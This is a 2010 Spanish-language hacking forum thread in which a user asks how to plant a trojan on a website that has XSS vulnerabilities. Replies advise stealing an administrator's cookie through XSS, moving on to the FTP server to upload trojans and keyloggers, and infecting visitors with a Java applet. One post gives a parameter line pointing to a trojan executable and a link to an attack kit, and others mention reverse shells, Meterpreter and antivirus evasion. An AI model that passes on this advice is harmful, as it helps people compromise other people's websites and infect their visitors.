Ayuda! Troyanizar una web.

laiox · 25 Junio 2010, 07:15 AM

hola, antes que nada, gracias por gastar su tiempo en leer mi post

bueno la cosa es asi, yo quiero troyanizar una web (Creo q esta bien el termino) q tiene Vulnerabilidades xss...
ya se como encontrar si es vulnerable a xss etc etc pero no encuentro tutos sobre como troyanizar esta web. si pueden dejar link se los agradezco

aaaaaaaa y si no es mucha molestia tmb quiero troyanizar una pagina mia para aprender un poco mas

Desde ya muchisimas gracias

Atte. Laiox

Debci · 25 Junio 2010, 09:21 AM

No no esta bien dicho, pues normalmente con un XSS pretendes robar datos comprometdores, si es un XSS persistente, por ejemplo en un DB SQL u otras, puedes conseguir robar la cookie a un admin, y si no es persistente, con un poco de ingenieria social tambien, una vez tienes privilegios en el sistema web, puedes dar saltos mas grandes como por ejemplo al servidor FTP y ahi ya subir tu troyano, keylogger y otros softwares dañinos (malware).

Saludos y se bueno

177600531 · 25 Junio 2010, 11:30 AM

Infecta mediante un Applet de Java. Configura la url de index.html con la dirección de donde está alojado tú troyano.

Exactamente esta es la línea que tienes que cambiar:

Código [Seleccionar]

<param name="url" value="http://www.adress.com/troyano.exe"> por la tuya.
Aquí tienes la url para bajar el paquete: http:/www.proxicrack.srw.ro/java.rar

laiox · 26 Junio 2010, 02:10 AM

muchas gracias por responder, pero yo eh leido que se puede hacer que el troyano sea descargado y ejecutado automaticamente sin preguntale al usuario que ingresa, creo q es con un script, si alguien me ayudaria en eso le agradeceria

MUCHAS GRACIAS POR RESPONDERME CHICOS

ESTA BUENO EL FORO

FELICITACIONES A LOS ADMINS, MODERADORES, ETC

Debci · 27 Junio 2010, 11:25 AM

Cita de: laiox en 26 Junio 2010, 02:10 AM
muchas gracias por responder, pero yo eh leido que se puede hacer que el troyano sea descargado y ejecutado automaticamente sin preguntale al usuario que ingresa, creo q es con un script, si alguien me ayudaria en eso le agradeceria

MUCHAS GRACIAS POR RESPONDERME CHICOS

ESTA BUENO EL FORO FELICITACIONES A LOS ADMINS, MODERADORES, ETC

Precisamente esas cosas son las que han corregido el 100% de los lenguajes de programación web, por eso el Java Applet infection es el mejor metodo, pues infectas sind escargar nada, al menos no visualmente, acepta un certificado, y obtienes una reverse shell, o una sesion de meterpreter.

Saludos

laiox · 27 Junio 2010, 18:09 PM

Ah! Muchas gracias ya entendi

jeje

Laiox !

tragantras · 28 Junio 2010, 09:38 AM

Cita de: Debci en 27 Junio 2010, 11:25 AM
Cita de: laiox en 26 Junio 2010, 02:10 AM
muchas gracias por responder, pero yo eh leido que se puede hacer que el troyano sea descargado y ejecutado automaticamente sin preguntale al usuario que ingresa, creo q es con un script, si alguien me ayudaria en eso le agradeceria

MUCHAS GRACIAS POR RESPONDERME CHICOS

ESTA BUENO EL FORO FELICITACIONES A LOS ADMINS, MODERADORES, ETC
Precisamente esas cosas son las que han corregido el 100% de los lenguajes de programación web, por eso el Java Applet infection es el mejor metodo, pues infectas sind escargar nada, al menos no visualmente, acepta un certificado, y obtienes una reverse shell, o una sesion de meterpreter.

Saludos

Claaaaro bypassing A.V así en 1 segundico, el "shikata_ga_nai" ese tan famoso, que supuestamente salta todo, no se a vosotros, pero a mi nunca me ha pasado el AVG :/